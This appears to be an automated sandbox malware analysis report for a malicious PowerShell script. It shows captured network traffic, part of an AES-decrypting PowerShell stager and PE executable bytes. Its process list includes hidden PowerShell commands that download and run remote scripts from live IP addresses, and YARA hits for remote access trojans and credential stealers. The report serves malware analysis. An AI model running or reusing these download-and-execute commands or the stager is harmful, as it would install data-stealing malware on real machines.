                                                                        Data Ascii: $xnhCXD = '7IZwEAtoj2yB7nqUODc4csh7lT62q+xtzIVau05pWug='$sQUVph = 'iFAi8ejFfKpgDQ8Y9Yc1kg=='$xBAOJ6 = 'BYYvHTePz7jKgdLZZiJYdBjMDep5YHJhKi1ZcD6WRH7MCCA0v6a8SamJbd9986wkG7WDFZ1Lz1h+jNfNb2OcCsPx7a3miJPJnajHCl2PrfvhV5+g2ynM/N3+bBnugZtQWqT9iGKEEyBYFRHvMNuEeISssK9P5PuTqXnGSJAY5SKtuBr3bIGrXgvbD6438G/RiLvAVbtubBg+AjUjPPqRoheqd3RWdAd0Fuw6tbc1izmf2qr//8v0N37ZU2czNGy72ieWxUGjaSdsxkihCw4YzmAoXxnOfjp9PcvRPkiF7jk48y557ClG4KB2SCJppKm4CLjs/ELQLlLz080Yl/jKEcrrChjGtoyt23k+5QsiTD3SRucv4bE29K13Zv5yWdsu0vag5jDFoJewWwJXs8xKpm4KKUE/2PV9Fcgw4W718pvDKv7aa5DInMcuvcSttl9Chq0ZFHiZfOYCI963DVfPurlPSy6yvxEynyfXzcYYJEO44N34cO+LRf7tH8CrFITJubaVvnW/Ou7KjS9o9LRlHEBseLEbOMMPg/vKbrueI6K/KoYb2hL+e9SDk/aeDrY0II0FRFETCaEQnJBfOubpU03wCHQRMMH7iz1NVC/X26gPZWyRRK+RdhthfQQS8LLX'function a10NrR ($o5pQm1, $xnhCXD, $sQUVph) { $4MGiFV = [Convert]::FromBase64String($xnhCXD) $OJ5UPJ = [Convert]::FromBase64String($sQUVph) $T9tJ95 = [Convert]::FromBase64String($o5pQm1) $9mUXlj = [Sys
                                                                        Jan 2, 2025 19:14:13.091274977 CET707INData Raw: 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 4b 65 79 20 3d 20 24 34 4d 47 69 46 56 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 49
                                                                        Data Ascii: tem.Security.Cryptography.Aes]::Create() $9mUXlj.Key = $4MGiFV $9mUXlj.IV = $OJ5UPJ $9mUXlj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $S1QRYq = $9mUXlj.CreateDecryptor($9mUXlj.Key, $9mUXlj.IV) $NKtx2h
                                                                        Jan 2, 2025 19:14:13.326118946 CET157OUTGET /infopage/rwvg1.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
                                                                        Jan 2, 2025 19:14:13.503917933 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 02 Jan 2025 18:14:13 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Thu, 02 Jan 2025 10:33:38 GMT
                                                                        ETag: "8a00-62ab6b1fe4fe2"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 35328
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELi"0z @ `(O H.text `.rsrc@@.reloc@B\H!`}0:(oi+aXi]Xi2*0(((o*(*0rpssor>sp~(o&or`sp~(o&o%~(oorsp~(orsp~(oo&*(*(*(*(*j(rsp(o*BSJBv4.0.30319l4#~
                                                                        Jan 2, 2025 19:14:13.503988981 CET1236INData Raw: 00 00 34 04 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 d4 07 00 00 08 74 00 00 23 55 53 00 dc 7b 00 00 10 00 00 00 23 47 55 49 44 00 00 00 ec 7b 00 00 74 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 00 09 00 00 00 00 fa 01 33
                                                                        Data Ascii: 4#Stringst#US{#GUID{t#BlobW3PPppQ1148
                                                                        Jan 2, 2025 19:14:13.504024029 CET1236INData Raw: 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c
                                                                        Data Ascii: tionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteMercado.exeNtilgEncodingSystem.Runtime.VersioningFro
                                                                        Jan 2, 2025 19:14:13.504056931 CET1236INData Raw: 00 66 00 47 00 41 00 4d 00 42 00 55 00 53 00 4d 00 47 00 49 00 55 00 67 00 59 00 62 00 46 00 49 00 55 00 66 00 53 00 77 00 6a 00 45 00 79 00 30 00 78 00 44 00 33 00 67 00 44 00 4b 00 78 00 74 00 4d 00 63 00 52 00 42 00 41 00 52 00 42 00 55 00 70
                                                                        Data Ascii: fGAMBUSMGIUgYbFIUfSwjEy0xD3gDKxtMcRBARBUpAW9jYzsEJDYeAEwLG0xgVRxHHiktWlomNUxFSVsMTEIONUoGSAZMfUQUHjEoET0xFQwuCwF7L0geQx4p
                                                                        Jan 2, 2025 19:14:13.504090071 CET1236INData Raw: 00 6d 00 56 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 31 00 45 00 46 00 42 00 35 00 6a 00 4e 00 6d 00 68 00 43 00 59 00 31 00 73 00 4d 00 54 00 45 00 4a 00 56 00 47 00 47 00 41 00 47 00 53 00 41 00 5a 00 4d 00 66 00 77 00 39 00 52 00 54 00 43
                                                                        Data Ascii: mVNLEgGTH1EFB5jNmhCY1sMTEJVGGAGSAZMfw9RTC0oCXtxWQBhaFUYYAZIBkx9RBQeY28LPCcXQE5OeDJgBkgGTH1EFB5jbUVqER5fGQ8QbChUDUcIf0g5NG
                                                                        Jan 2, 2025 19:14:13.504102945 CET1236INData Raw: 00 63 00 51 00 30 00 51 00 55 00 43 00 6b 00 42 00 75 00 4e 00 7a 00 39 00 46 00 49 00 43 00 49 00 56 00 53 00 41 00 41 00 48 00 58 00 41 00 4e 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 30 00 55 00 52 00 6c 00 63 00 31 00 4c 00 42 00 45 00 74
                                                                        Data Ascii: cQ0QUCkBuNz9FICIVSAAHXANNLEgGTH0URlc1LBEtYx9JAAcSWTRDSEQDMggUbSY5Mic0TRg4CgddIUIrSQIpAUxKBygJLSQaWAlKPFY0dhxUTCkMRlsiKUlo
                                                                        Jan 2, 2025 19:14:13.504116058 CET1236INData Raw: 00 52 00 52 00 47 00 55 00 54 00 63 00 6f 00 42 00 6a 00 78 00 71 00 51 00 43 00 46 00 6d 00 51 00 6c 00 55 00 59 00 59 00 46 00 59 00 61 00 54 00 78 00 6f 00 38 00 45 00 46 00 45 00 65 00 4a 00 79 00 67 00 4a 00 4c 00 53 00 51 00 61 00 57 00 41
                                                                        Data Ascii: RRGUTcoBjxqQCFmQlUYYFYaTxo8EFEeJygJLSQaWAlCF1cvSkhxHjQQUXMmIAo6Oj9JAAcSWTRDQG8CKTRATGM9FycgHl8fTlVRLlJIRA0uAXVaJz8AOzBXDA
                                                                        Jan 2, 2025 19:14:13.504127026 CET1236INData Raw: 00 78 00 49 00 67 00 59 00 74 00 4d 00 41 00 68 00 74 00 47 00 42 00 59 00 48 00 55 00 53 00 4a 00 54 00 48 00 45 00 4d 00 66 00 63 00 55 00 52 00 39 00 55 00 44 00 63 00 64 00 45 00 54 00 70 00 6a 00 44 00 30 00 51 00 65 00 42 00 78 00 52 00 63
                                                                        Data Ascii: xIgYtMAhtGBYHUSJTHEMfcUR9UDcdETpjD0QeBxRcAVIcVAU/EUBbMGFoQmNbDExCVRhgRAdJAH0NWlYmPww8CxpCCA4QS2wGHU8CKURXTCYsESEsFWoAAxJL
                                                                        Jan 2, 2025 19:14:13.504142046 CET1236INData Raw: 00 32 00 74 00 53 00 64 00 31 00 38 00 2f 00 58 00 41 00 4e 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 30 00 55 00 52 00 6c 00 63 00 31 00 4c 00 42 00 45 00 74 00 59 00 77 00 68 00 59 00 44 00 52 00 59 00 63 00 57 00 32 00 42 00 31 00 44 00 56
                                                                        Data Ascii: 2tSd18/XANNLEgGTH0URlc1LBEtYwhYDRYcW2B1DVI4NRZRXycOCiY3HlQYJhBUJUEJUgl9N1FKFyUXLSIfbwMMAV04UkgbTBELVVoCPQx0EB5YOAoHXSFCK0
                                                                        Jan 2, 2025 19:14:13.504153967 CET1236INData Raw: 00 4a 00 44 00 68 00 42 00 66 00 49 00 56 00 49 00 4e 00 42 00 6a 00 6f 00 30 00 46 00 6b 00 42 00 4c 00 49 00 69 00 45 00 6b 00 4a 00 43 00 38 00 55 00 54 00 79 00 6b 00 61 00 56 00 51 00 56 00 67 00 61 00 67 00 64 00 48 00 43 00 42 00 77 00 55
                                                                        Data Ascii: JDhBfIVINBjo0FkBLIiEkJC8UTykaVQVgagdHCBwUXQIVJBc8NhpALQ4ZVyNjEGIJMQFTXzcoW2AEHlgtEhx2IUsNVUR0PwRjb20iLTc6XAUsFFUlVUAPN2o5
                                                                        Jan 2, 2025 19:14:14.318819046 CET157OUTGET /infopage/ersyb.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
                                                                        Jan 2, 2025 19:14:14.509876013 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 02 Jan 2025 18:14:14 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Thu, 02 Jan 2025 09:39:17 GMT
                                                                        ETag: "2fdc00-62ab5ef921a41"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 3136512
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@/S0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:13:14:04
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1"
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:13:14:04
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:13:14:05
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:13:14:09
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
                                                                        Imagebase:0x7ff73fb70000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:13:14:09
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Temp\Package.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Temp\Package.exe
                                                                        Imagebase:0xd20000
                                                                        File size:206'304 bytes
                                                                        MD5 hash:2696D944FFBEF69510B0C826446FD748
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:13:14:10
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:13:14:10
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:13:14:10
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
                                                                        Imagebase:0x3f0000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:13:14:12
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
                                                                        Imagebase:0x740000
                                                                        File size:2'141'552 bytes
                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:13:14:12
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"
                                                                        Imagebase:0xd50000
                                                                        File size:46'832 bytes
                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:13:14:15
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x490000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:13:14:15
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x80000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:13:14:15
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0xd0000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:13:14:15
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x60000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:13:14:15
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0xe0000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:13:14:21
                                                                        Start date:02/01/2025
                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204
                                                                        Imagebase:0x210000
                                                                        File size:483'680 bytes
                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2236675376.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848cd0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 64963a42fe2196a667ed450a996269e9fae4f6ed5eae1bd9286d9dfe19db03a2
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 6F01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2216164883.00007FF848D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff848d00000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: cadf7c45b088c9c0b9ed52c884df090bc0b9bbd02cbc4300a5154b761c9ac79d
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 2C01677111CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2216635045.00007FF848DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff848dd0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e481bf982b9d083f8c51738d6d31deb0ee0286ad9bd3880ceedad94da3f5ec32
                                                                          • Instruction ID: 7db51215439ae1559cb5380122702f604124de041b27ab67aa8443cd72db4e58
                                                                          • Opcode Fuzzy Hash: e481bf982b9d083f8c51738d6d31deb0ee0286ad9bd3880ceedad94da3f5ec32
                                                                          • Instruction Fuzzy Hash: CFE0D833E0EC991EEBA1B65C34086F4A2D0EF58272B491177D90DC3186DE049C144795

                                                                          Execution Graph

                                                                          Execution Coverage:6.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.9%
                                                                          Total number of Nodes:1770
